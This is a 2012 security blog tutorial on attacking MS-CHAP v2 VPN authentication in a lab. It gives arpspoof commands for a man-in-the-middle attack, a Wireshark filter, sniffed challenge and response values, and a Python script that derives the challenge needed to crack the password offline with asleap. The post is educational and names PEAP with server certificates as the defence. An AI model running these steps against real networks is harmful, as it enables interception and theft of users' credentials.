Tuesday, September 11, 2012

Attacking MS-CHAP v2

MS-CHAP v2 is an authentication protocol widely used in VPN implementations.
It uses a challenge-response mechanism in combination with the NT hash of the password to transfer the credentials.

Unlike the older CHAP authentication, where the server needs the plaintext password, MS-CHAP v2 only requires the NT hash of the password to validate the challenge-response.
It can also be used as an EAP method, EAP MS-CHAP v2, in combination with a RADIUS server. When deployed that way, the RADIUS server is responsible for generating the challenge and for validating the response.

So we are pretty safe here? There is no way to recover the password?

Well, maybe there is. We will demonstrate...

In our setup we use a RADIUS server with EAP MS-CHAP v2 as the authentication protocol.

VPN server: 10.0.1.1
VPN client: 10.0.1.100

We'll describe (briefly) the flow:

The client connects to the VPN server, which acts as the RADIUS client. The VPN server sends a RADIUS Access-Request to the RADIUS server; all RADIUS messages travel between the RADIUS client and the RADIUS server. The RADIUS server generates a challenge and sends it, through the RADIUS client, to the VPN client. The VPN client sends back its response. The RADIUS server validates the response and sends a RADIUS Access-Accept message to the VPN server, which then grants the client access.

The challenge and the response are sent in clear text. The root of all evil starts here :)
We will try to capture them with our sniffer. To capture the traffic between client and server we will perform a man-in-the-middle (MiTM) attack (unless you have a hub).

We start an ARP spoofing attack with the tool arpspoof.

Syntax:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.1.1 10.0.1.100
arpspoof -i eth1 -t 10.0.1.100 10.0.1.1


Now all traffic between the two hosts passes through the attacker's machine. We can start Wireshark to sniff the traffic.
After filtering the messages we find both the challenge and the response!

filter: (ip.src==10.0.1.100 or ip.dst==10.0.1.100) and eap

(The parentheses matter: in Wireshark display filters "and" binds tighter than "or", so without them the filter also shows all non-EAP traffic sent by the client.)

We copy both values as a hex stream.

Our challenge:

93389f82ae615e7d488953d2f6d4cee6

Our response:

2a75d21673b1bdf2122719b093e4d27c000000000000000041dcd2b40b06ed540208e86027dd2b3643583fd6ee8dd89a00

Now we can use a tool called asleap to recover the password from our sniffed challenge and response. asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and MS-CHAP passwords.
It uses a dictionary attack to recover the password. For each plaintext password in the dictionary file it generates an MD4 hash, which is the NT hash. Then it DES-encrypts the challenge three times, with keys derived from that NT hash. If the result matches our sniffed response, we know that the password is cracked!
Unfortunately, we will not succeed in cracking the password using the above challenge and response together with a custom dictionary file.

After a little searching I found that MS-CHAP v2 also uses a client challenge and the username to generate the response. So using only our server challenge in combination with the NT hash and the DES algorithm can never produce our response!

An MS-CHAP v2 client uses SHA-1 to hash the client challenge, the server challenge and the username. The first 8 bytes of that hash form a new challenge. This new challenge, encrypted with DES under the NT hash, results in our response.
If we can compute this new challenge, we can recover the password using asleap!

I found some interesting articles about how MS-CHAP v2 creates this challenge. Based on this information I wrote a little Python script that calculates the new challenge and automatically starts asleap with our custom dictionary file. I called the tool chappie.py :)

We only need to enter our known parameters:

Once entered, we can recover the password. Our password was pretty obvious.

The following Python code calculates our new challenge. We convert the original server challenge and the client challenge to binary values. Together with the username we compute a SHA-1 hash and take its first 8 bytes (16 hexadecimal characters).
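As an added example (not the post's chappie.py, which only survives as a screenshot), the script below does that calculation the way RFC 2759 defines ChallengeHash, starting from the two hex streams sniffed above. It assumes the 49-byte response layout from RFC 2759 (Peer-Challenge, 8 reserved zero bytes, NT-Response, Flags) and, because the post never shows the account name, uses the placeholder username "vpnuser".

```python
import hashlib
from dataclasses import dataclass


@dataclass
class MsChapV2Response:
    peer_challenge: bytes  # 16 bytes chosen by the client
    nt_response: bytes     # 24 bytes: 3 x DES over the 8-byte challenge, keys from the NT hash
    flags: int             # 1 byte, always 0 in MS-CHAP v2


def parse_response(hex_stream: str) -> MsChapV2Response:
    """Split the 49-byte Response value copied from Wireshark. Layout per RFC 2759:
    Peer-Challenge(16) | Reserved(8, all zero) | NT-Response(24) | Flags(1)."""
    raw = bytes.fromhex(hex_stream)
    if len(raw) != 49:
        raise ValueError(f"expected a 49-byte response value, got {len(raw)} bytes")
    if raw[16:24] != bytes(8):
        raise ValueError("reserved field is not zero; this is not an MS-CHAP v2 response")
    return MsChapV2Response(raw[0:16], raw[24:48], raw[48])


def challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash(): the first 8 bytes of
    SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
    UserName is the bare account name, without any prepended domain."""
    if len(peer_challenge) != 16 or len(authenticator_challenge) != 16:
        raise ValueError("both challenges must be exactly 16 bytes")
    data = peer_challenge + authenticator_challenge + username.encode("ascii")
    return hashlib.sha1(data).digest()[:8]


def asleap_challenge(server_challenge_hex: str, response_hex: str, username: str) -> str:
    """The 8-byte challenge (as 16 hex characters) that asleap needs next to the
    24-byte NT-Response field; those two values alone are enough for an offline
    dictionary attack, which is exactly why capturing them is a problem."""
    resp = parse_response(response_hex)
    return challenge_hash(resp.peer_challenge, bytes.fromhex(server_challenge_hex), username).hex()


# The two hex streams sniffed in the post. The username is not shown in the post,
# so "vpnuser" below is a constructed placeholder.
SERVER_CHALLENGE = "93389f82ae615e7d488953d2f6d4cee6"
RESPONSE = ("2a75d21673b1bdf2122719b093e4d27c" "0000000000000000"
            "41dcd2b40b06ed540208e86027dd2b3643583fd6ee8dd89a" "00")

if __name__ == "__main__":
    r = parse_response(RESPONSE)
    print("peer challenge  :", r.peer_challenge.hex())
    print("NT-Response     :", r.nt_response.hex())
    print("asleap challenge:", asleap_challenge(SERVER_CHALLENGE, RESPONSE, "vpnuser"))
```

The RFC 2759 test vector (username "User", the "[]|}{?/><,`!2&&(" authenticator challenge and the "!@#$%^&*()_+:3|~" peer challenge giving challenge D0 2E 43 86 BC E9 12 26) is a quick way to confirm the calculation before trusting it on captured data.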

Oops... and you thought that MS-CHAP v2 with a RADIUS server was safe?
How to defend against such attacks? Well, you should definitely attend our IT Security BOOTCAMP courses. We will teach you that a server certificate and the PEAP protocol solves the problem...

Thanks for reading this article!
Do not hesitate to contact me if you have any questions or if you need more information.
You can also follow us on Twitter: http://twitter.com/MME_IT